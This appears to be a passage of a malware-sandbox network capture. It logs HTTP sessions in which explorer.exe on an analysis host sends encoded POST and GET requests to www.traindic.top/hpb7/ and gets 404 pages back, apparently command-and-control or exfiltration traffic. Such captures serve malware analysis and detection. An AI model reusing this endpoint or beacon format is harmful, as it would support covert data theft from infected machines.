20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 not found</title> <link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><main class='container'> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <s
                                                          Mar 21, 2023 08:08:14.177403927 CET462INData Raw: 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72
                                                          Data Ascii: pan class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span c
                                                          Mar 21, 2023 08:08:14.177444935 CET463INData Raw: 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 30 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 30 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73
                                                          Data Ascii: > <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          8192.168.2.349706162.0.231.7780C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:16.610590935 CET469OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.traindic.top
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.traindic.top
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.traindic.top/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 77 49 4e 32 4a 77 69 55 5a 5f 4d 46 54 65 4b 31 47 5a 62 52 28 6a 52 4d 28 2d 35 4c 66 4f 28 36 6b 6e 6b 54 41 74 76 50 6f 72 56 5f 36 37 69 63 32 4d 34 42 4c 4c 5a 51 68 57 57 74 4a 56 4a 6e 33 42 7a 53 75 52 48 54 65 65 71 70 4e 48 77 48 55 79 6d 33 68 44 46 4c 5a 64 77 53 61 62 64 4e 74 6f 58 51 51 64 6c 35 45 38 6b 47 4d 48 76 78 36 30 71 38 53 66 76 47 77 47 59 77 56 46 28 75 56 70 62 78 52 51 47 58 73 41 56 51 7e 34 76 4f 37 4a 42 6d 39 67 48 68 6a 4d 56 53 7a 61 6e 71 4c 72 6d 70 64 6e 5a 4f 78 4c 55 61 56 2d 6b 51 75 48 64 44 70 67 7e 43 6f 73 66 42 59 36 67 72 63 35 4d 5a 6d 63 4d 4c 77 77 43 6e 74 4a 75 51 7e 31 51 4e 6c 6d 61 46 78 38 6c 6e 54 72 54 72 4d 63 35 56 55 48 37 44 4e 6a 42 6b 59 31 58 5f 36 7a 62 46 6d 47 73 57 56 6a 75 62 74 7a 57 6d 6b 46 32 76 31 35 63 41 6c 76 78 70 55 57 78 75 4c 55 7a 61 4e 7a 79 45 4c 33 6b 49 74 6a 42 2d 5a 6c 43 52 47 2d 6b 77 39 6e 79 67 42 6b 71 4e 6e 63 4e 30 31 46 66 78 7e 59 70 74 4e 34 43 6e 32 58 74 66 6e 5f 28 34 36 37 67 32 50 63 6d 49 56 6b 6e 52 56 7a 4c 41 73 76 54 52 75 59 6e 72 66 76 55 57 53 45 35 30 77 63 5a 4e 39 6c 38 63 6d 5f 62 46 53 53 54 5a 71 66 70 51 36 70 6d 35 37 57 58 32 71 43 44 46 64 4c 6f 4c 4a 68 77 4b 71 66 6e 77 73 30 71 47 73 45 63 78 30 72 53 78 34 75 6f 75 74 31 58 46 28 31 52 4e 53 41 34 36 79 4c 31 58 33 64 6b 4d 7e 56 32 31 52 50 73 52 46 65 61 66 68 34 7e 6f 50 6b 4e 44 7a 5f 45 74 32 68 36 65 4e 52 39 73 6e 45 36 4a 28 35 6b 4f 59 58 6a 48 79 44 77 73 51 6b 35 32 53 2d 65 46 50 4d 30 49 61 39 67 72 46 6c 63 67 71 6e 4a 6a 51 4c 6e 4e 70 7a 64 71 50 46 56 6a 62 6a 65 36 76 7a 48 38 37 5a 39 6b 28 63 49 52 44 51 64 49 5a 34 50 4e 44 4f 65 6b 74 69 56 6f 31 36 78 66 39 65 65 35 72 76 6f 62 52 68 66 4b 69 39 59 35 39 52 76 72 30 39 41 57 4f 42 51 38 70 65 66 7a 4e 42 55 45 56 78 44 62 33 4e 52 30 52 32 58 73 7e 4b 42 4f 57 63 50 66 6f 7a 77 48 58 51 6f 72 45 32 33 79 75 78 28 38 43 4d 48 5a 65 4b 39 74 74 68 51 75 79 74 33 56 61 36 67 61 66 59 33 6f 65 61 4b 78 33 77 39 55 5a 4e 79 4e 36 35 6e 61 71 43 43 68 62 64 70 6a 37 32 54 48 64 31 75 54 78 53 6c 4b 69 56 4e 32 58 66 66 76 78 52 76 33 6a 45 77 31 6f 4c 63 5a 34 75 37 6a 46 76 32 71 4d 73 43 4b 6f 6a 33 70 48 73 73 77 74 44 6d 64 52 62 4a 6f 4f 5f 74 62 6f 75 71 43 69 5a 33 58 37 37 31 74 35 67 4b 48 63 61 28 64 48 68 4a 51 6e 7a 74 78 44 57 56 34 41 6b 4f 6c 75 4a 6f 32 7a 56 4a 67 73 54 38 36 6e 6d 33 74 65 78 7a 6b 7a 6f 52 4d 6f 6c 39 53 79 79 4c 36 6c 77 46 61 59 34 52 4f 4b 30 48 45 43 64 4c 73 62 46 70 65 37 4a 77 66 7a 53 4d 69 55 36 4e 41 4a 50 7e 4b 68 46 71 42 54 67 79 65 28 59 67 51 6c 68 41 46 78 76 62 66 47 72 70 77 39 61 43 4f 58 35 75 56 51 5a 4a 44 42 7a 6e 30 6f 49 67 6c 56 4b 76 37 63 45 72 4b 52 4f 46 6c 62 41 38 32 61 32 78 59 4f 74 37 32 73 5a 30 50 6c 30 70 50 47 30 68 49 7e 31 4e 61 6c 70 35 4f 5a 38 5a 72 75 6a 37 70 36 51 78 6d 48 30 54 70 7a 71 63 34 39 43 7e 73 6b 32 55 7a 7e 36 43 6d 47 46 34 4e 6c 48 52 54 7a 68 45 78 38 47 4d 47 7e 75 6d 32 44 68 35 46 6b 72 38 63 79 7a 34 6a 4f 48 39 2d 65 48 70 78 6d 64 75 75 74 4c 50 38 76 39 4e 58 5a 49 54 36 7e 67 52 78 54 67 63 4e 63 53 79 41 71 50 69 4e 38 5f 6e 4c 64 66 76 63 44 4c 36 5f 32 76 4d 79 6c 47 7e 48 7e 49 43 44 67 31 4a 4c 54 61 4c 73 4b 46 51 30 32 6f 4a 61 61 51 43 45 61 4d 56 69 55 6b 77 6f 7a 41 70 49 42 71 50 42 58 44 50 62 75 67 7a 57 34 6a 52 52 66 45 67 31 33 48 53 6b 6d 73 63 56 56 33 66 6c 28 67 59 48 38 72 74 5f 7e 6e 48 79 46 37 56 74 47 78 51 6c 4d 38 51 48 4c 78 49 43 48 63 7e 41 53 67 52 4f 5a 72 70 37 6b 5f 37 39 62 36 4c 43 28 51 72 5f 72 31 41 57 30 64 7e 61 79 48 6f 37 68 32 6d 6b 45 5f 57 36 46 59 48 70 4a 36 6b 6f 41 58 5a 79 66 63 61 59 67 30 52 4e 35 61 34 68 65 58 74 31 45 74 39 64 64 35 48 6a 38 4b 4b 62 32 68 6b 65 65 6b 51 6b 58 6e 6c 74 43 62 78 6f 30 38 6b 68 5a 4a 32 37 41 4d 6a 39 6a 6d 6f 54 70 70 4a 59 52 55 35 49 6d 61 68 6e 68 7a 47 7a 46 4f 79 68 77 58 79 4c 30 57 39 74 4c 6e 7a 50 5a 41 58 36 43 45 5a 66 56 48 6b 75 61 4c 49 61 6e 2d 57 65 50 65 46 75 73 6c 61 4f 35 51 34 38 77 70 52 6e 7a 51 48 6f
                                                          Data Ascii: bcX3Uv=WRFlhw3KAgb5wIN2JwiUZ_MFTeK1GZbR(jRM(-5LfO(6knkTAtvPorV_67ic2M4BLLZQhWWtJVJn3BzSuRHTeeqpNHwHUym3hDFLZdwSabdNtoXQQdl5E8kGMHvx60q8SfvGwGYwVF(uVpbxRQGXsAVQ~4vO7JBm9gHhjMVSzanqLrmpdnZOxLUaV-kQuHdDpg~CosfBY6grc5MZmcMLwwCntJuQ~1QNlmaFx8lnTrTrMc5VUH7DNjBkY1X_6zbFmGsWVjubtzWmkF2v15cAlvxpUWxuLUzaNzyEL3kItjB-ZlCRG-kw9nygBkqNncN01Ffx~YptN4Cn2Xtfn_(467g2PcmIVknRVzLAsvTRuYnrfvUWSE50wcZN9l8cm_bFSSTZqfpQ6pm57WX2qCDFdLoLJhwKqfnws0qGsEcx0rSx4uout1XF(1RNSA46yL1X3dkM~V21RPsRFeafh4~oPkNDz_Et2h6eNR9snE6J(5kOYXjHyDwsQk52S-eFPM0Ia9grFlcgqnJjQLnNpzdqPFVjbje6vzH87Z9k(cIRDQdIZ4PNDOektiVo16xf9ee5rvobRhfKi9Y59Rvr09AWOBQ8pefzNBUEVxDb3NR0R2Xs~KBOWcPfozwHXQorE23yux(8CMHZeK9tthQuyt3Va6gafY3oeaKx3w9UZNyN65naqCChbdpj72THd1uTxSlKiVN2XffvxRv3jEw1oLcZ4u7jFv2qMsCKoj3pHsswtDmdRbJoO_tbouqCiZ3X771t5gKHca(dHhJQnztxDWV4AkOluJo2zVJgsT86nm3texzkzoRMol9SyyL6lwFaY4ROK0HECdLsbFpe7JwfzSMiU6NAJP~KhFqBTgye(YgQlhAFxvbfGrpw9aCOX5uVQZJDBzn0oIglVKv7cErKROFlbA82a2xYOt72sZ0Pl0pPG0hI~1Nalp5OZ8Zruj7p6QxmH0Tpzqc49C~sk2Uz~6CmGF4NlHRTzhEx8GMG~um2Dh5Fkr8cyz4jOH9-eHpxmduutLP8v9NXZIT6~gRxTgcNcSyAqPiN8_nLdfvcDL6_2vMylG~H~ICDg1JLTaLsKFQ02oJaaQCEaMViUkwozApIBqPBXDPbugzW4jRRfEg13HSkmscVV3fl(gYH8rt_~nHyF7VtGxQlM8QHLxICHc~ASgROZrp7k_79b6LC(Qr_r1AW0d~ayHo7h2mkE_W6FYHpJ6koAXZyfcaYg0RN5a4heXt1Et9dd5Hj8KKb2hkeekQkXnltCbxo08khZJ27AMj9jmoTppJYRU5ImahnhzGzFOyhwXyL0W9tLnzPZAX6CEZfVHkuaLIan-WePeFuslaO5Q48wpRnzQHoXO4kwBXFLGB5HzYKaSTg0IOG88enEjV1fl8rxpC0ymYVPN8K8zk6(90dv0cQv0HOx8bQVZdTOlzqOJKdO39yyguuh6UXIaj6GilAVHUWeb75j97JBb62Td(YONuG5IVREOP561HVNXp5EjjQDTUC(73AyQAC523WZOlOUg6lX8SnGArlhvJ7H7oXPQ(4hZl9KLua0OiL(tmm9Rgad1hTAd8xslYOZnZ8PVniFO9OhSu7799LvwucEgCQ94jf74yk3XeMMIWm7j9F2iAMzzwsDJ3R1MqtTz~pkrtfaa1HPPaqVq71FmhsvLWtReOS503qiydVy_Ii0q8FRPWGLEg2MOwdILrQENlDKxD_tlEnikUqWwEM~c41lyWJNjsncEKt5mMPGnJM9Q0rTXP_h_Xy(1IMNDMRLwgaeHvFiOoOF6rEu2d4t6LTgNLVwryzDMxq0LZQzz30c28ZwRqP2w7L4pceS-k4NfkDLJdBkH03Io2Vj0p_RgKmfrJuRhynJzmzoRwB~BWaWNyYQqakZNyUB_4349tVIn5kT_1G1rvtvKR-Uiy6wDuJGwujtDK-JKtgvRirgEFlyu7qrPj-XpJ_ugtVqCD9k8vNbWNPsvW3rmgXwnnLsh0LjP(6Kwh93A6jwBWRgpyefcPdHow3xcWiRnQqIDq2AxgXBg4-0MHHKQMB6UfGdZRRyFYt7hPsVowoW_t8odPST6cguPMkVCpI1qvGNTMi~wpAXjeRXlM6~4kvnP5k5_C93UykTQmbZvoHZBdWtsC5g_nCP7(RLAsAvgI5J-O-0-QNpBOXMZw7w9XyaypqKV91WhjQCQ(EdVVVoAOLZx5-408FrJ98bgy98a~Jgjw2OD27JXNkYojU5GPuWXTJrxEg0TPLkqGoVNWNekvOrzUp69GV3PNlD_TVZKeGbsdbiqLfy3fgVpd2dvt1Hw9DQHwA(PMqlgI_c0xoFWCS1xi4TLOMjwHgC2YPLOLQ8Yyh3HNorypruef-hLpgaWQAdLC6gju54jKVHfgX06Qkc0Fi6HWNC_sUnYmGHLHOBLRDLFgfmpNGxOm_YTkp~dcz1UrbWfUxvT2An5qLDHpN1gYCuJnM8ysAuVYKPGC7ret9URRUikt2C5vVBwc_gWZBof2VPXcI8awpoZPbdpGo9JEnA6vehxKv3BVnvdVGWfpvzq84H2pcTwRxJ_uJMAQVIOBdDfWTflTeL7Ng8VxyKRVDqZwGMtOZN6rdz9HgVrjmTwNYz-P7astdgshFXHKN4P58DVbyCW0-lIrn1nT68WzhBKjlxupqqUGsc8diew5z8mTNuyOkkay3OCYMUUKS6H4XYyY-KZeHa_M_YnjKYx4ofU5eacqELtWs4zxL2cbNhLqi01ecl5mLysvc8g9if6qxEEQCM9ESnLTOZdkBbKAEYiGbUmjqSZ2S2IXbmIqT8l7sizQT7s7zbr8as94IpLQ6rV(FKl~lAgjJERjGIxokjhBMFQ1lJdMUe9bc1tT9r65P0pHD8dE3XWIh2K1Q436Bloo_vGmJqkk4t8s8eqfOyv6EdZwAPTqwMGNCGGhqnrfwAp1PbrH3J9WjRoC2Xvu3I4KBU0PjxEm5G_tnZNkkb0(QMYtISoYJ2Gs1FfWwOq18W3DkfsuOsb44GkoOsBHHbflXJIzVF8mo~cYTSqsAPvQPktZF5XVYhgKbKBsCCVeGTgLo4rZhFvpDtu2f2KXmpLmERO2hFPlgPAc22sLe(IuMHtmSRjEPlPIbdF(FzxuqLHRmybsMFz9sAxaLQtZ-omm4CGna1oiFIv5-NsNxYgBd8BOQ~Dwda6O9YIoN0H(aevwXQPSVAP~ADEHWKV2khiy4Rnwf(CG9OwuUPVZHRwh_lzIe9mT7IyqQuF3f0wZ_2pf4gfAHtQM5eePUHis4Rn9oPaFr(yF7TakiQX7uKEq728lPDO3RC4pa6W5_G-vBZhH35VuXMT5GO7GaPC31EHzFYLdmsQteSRZNEazdu-GYAZl4R_V-IcrH0zxqhkAyVe7m3MphU1Jd3ynjU15vb8KtVj0B(nnrhWjlvmfB7XkVQ3JPZN2t9R2NcvelyrKdtGbniSlTzb(sbli2pNYj~rwInPcf5Yv9NgjEN8xXDTnVJ8AopcmkmSbXhhrXN_XRvsevvozDG6x10z8X6xC5r_~e9svv5uQgH_zSy5Qp~v4a0Lt-q7ok5li7DaNoIsLHjLHqxEu0gTdfRBNiBDrvrtx2aS~KI0vQCYObHlNDzFzq9XJ242U3zaoayBgx8naXBXzcLGNZpb4PqxDuGbsl3RCbLuXZ8Hd7aJW_kgJnfZd5lxwlJd~RWv5B(5NASL4yo5qnuYy3hbjPfflhF7iOQrOFf29e557wChSn16a8s0BZ2uCjCyBcw44PlHp3E7lo4ZJaWB23XqMBAspqqqmA3-s-lABjUctwuZkSFKwf4DI4JsJiDW0BEoiQ1pFULiF-cLKPfQvuEiNDmlRS0CRRDe~-sPbBP7~WclSCznCWpJBYQ1f_6yLt3rEbgUQgQUR0Mw8rYEr2fyak3jvBv6v3Iat8pa9RzeO4wlSebAqMrJVQAlCpe8EPdIiXB8Yz(sQt6YlW1939gTVY0Ey2c27gvudh57a98z~tdmP6NlbmBch2UFFLm63jkpA7qHQnOJuGT4mWlpA_PPTHWPYW9fT2g-jraEosmdvkzSBplXZwhy215RHzhVfW7bNuNgotd6aFmIG
                                                          Mar 21, 2023 08:08:16.897162914 CET470INHTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:16 GMT
                                                          Server: Apache
                                                          Content-Length: 3242
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 not found</title> <link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><main class='container'> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <s
                                                          Mar 21, 2023 08:08:16.897229910 CET472INData Raw: 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72
                                                          Data Ascii: pan class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span c
                                                          Mar 21, 2023 08:08:16.897277117 CET472INData Raw: 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 30 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 30 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73
                                                          Data Ascii: > <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          9192.168.2.349707162.0.231.7780C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:19.320394993 CET473OUTGET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1
                                                          Host: www.traindic.top
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:08:19.611036062 CET475INHTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:19 GMT
                                                          Server: Apache
                                                          Content-Length: 3242
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
